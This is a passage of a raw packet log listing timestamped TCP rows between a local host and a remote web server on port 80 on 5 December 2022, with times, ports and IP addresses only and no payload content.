Dec 5, 2022 01:32:31.320166111 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.320193052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.320247889 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.320950031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.320995092 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.321036100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.321047068 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.321077108 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.321119070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.321129084 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.321883917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.321926117 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.321947098 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.321968079 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.322015047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.322026968 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.322077990 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.322137117 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.322899103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.322946072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.322989941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.323010921 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.323031902 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.323075056 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.323086977 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.323808908 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.323853016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.323872089 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.323895931 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.323936939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.323950052 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.323980093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.324038029 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.324736118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.324780941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.324821949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.324840069 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.324865103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.324907064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.324918032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.325660944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.325702906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.325721025 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.325745106 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.325788021 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.325798035 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.325829983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.325886011 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.326596022 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.326641083 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.326682091 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.326692104 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.326723099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.326765060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.326775074 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.327496052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.327541113 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.327558041 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.327581882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.327622890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.327636003 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.327666998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.327730894 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.328464031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.328507900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.328552008 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.328577995 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.328593969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.328649998 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.328665972 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329600096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329643965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329667091 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.329680920 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329735994 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.329808950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329852104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329895020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329909086 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.329940081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329982042 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.329991102 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.330754042 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.330801010 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.330813885 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.330843925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.330897093 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.330903053 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.330945969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.331003904 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.331698895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.331742048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.331784010 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.331799030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.331826925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.331870079 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.331880093 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.332628012 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.332669973 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.332684994 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.332714081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.332756042 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.332765102 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.332798958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.332850933 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.333615065 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.333657980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.333700895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.333714008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.333745003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.333786011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.333796024 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.334495068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.334539890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.334553003 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.334584951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.334625006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.334636927 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.334667921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.334717989 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.335481882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.335522890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.335562944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.335581064 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.335601091 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.335642099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.335659027 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.336401939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.336442947 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.336457014 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.336481094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.336520910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.336534023 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.336563110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.336620092 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.337327957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.337367058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.337407112 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.337420940 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.337446928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.337485075 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.337502956 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.338259935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.338298082 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.338330984 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.338336945 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.338376999 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.338393927 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.338416100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.338473082 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.339000940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.339047909 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.339104891 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.339107990 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.339148045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.339185953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.339201927 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.339225054 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.339281082 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.339893103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.339934111 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.339971066 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340008974 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340017080 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.340051889 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340070009 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.340111971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340172052 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.340794086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340832949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340872049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340894938 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.340909004 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340949059 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.340967894 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.340989113 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.341720104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.341758966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.341768026 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.341816902 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.343022108 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343064070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343102932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343117952 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.343142033 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343182087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343199015 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.343220949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343277931 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.343482018 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343519926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343559980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343585014 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.343599081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343637943 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343655109 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.343677998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.343738079 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.344371080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.344410896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.344448090 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.344466925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.344485998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.344526052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.344540119 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.344564915 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.344621897 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.345287085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.345326900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.345365047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.345402956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.345411062 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.345442057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.345470905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.345480919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.345536947 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.346160889 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.346200943 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.346236944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.346256018 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.346273899 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.346313953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.346328974 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.346353054 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.346417904 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.347070932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.347110987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.347148895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.347187042 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.347235918 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.347237110 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.347253084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.347295046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.347349882 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.347995043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348036051 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348073959 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348093987 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.348114014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348151922 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348160982 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.348191023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348264933 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.348864079 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348903894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348942041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348978996 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.348983049 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.349018097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.349025965 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.349057913 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.349107981 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.349746943 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.349786997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.349824905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.349848032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.349863052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.349901915 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.349910975 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.349940062 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.349986076 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.350651026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.350692034 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.350729942 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.350759983 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.350769043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.350809097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.350816965 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.350847006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.350903988 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.351558924 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.351598978 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.351636887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.351650000 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.351674080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.351711988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.351721048 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.351752043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.351804018 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.352456093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.352497101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.352536917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.352549076 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.352577925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.352616072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.352624893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.352654934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.352705002 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.353359938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.353399992 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.353452921 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.356013060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.356049061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.356087923 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.356127977 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.356148005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.356187105 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.356199980 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.356226921 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.356264114 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.356278896 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.356303930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.356353045 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.357012987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357054949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357094049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357115030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.357131958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357171059 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357208967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357234001 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.357284069 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.357886076 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357927084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357964993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.357985020 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.358002901 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.358041048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.358052969 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.358079910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.358129978 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.358767986 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.358808994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.358848095 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.358880997 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.358903885 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.358942032 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.358956099 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.358979940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.359030008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.359644890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.359684944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.359721899 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.359743118 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.359761953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.359802008 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.359812021 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.359842062 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.359889030 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.360565901 CET	80	49704	66.235.200.147	192.168.2.3
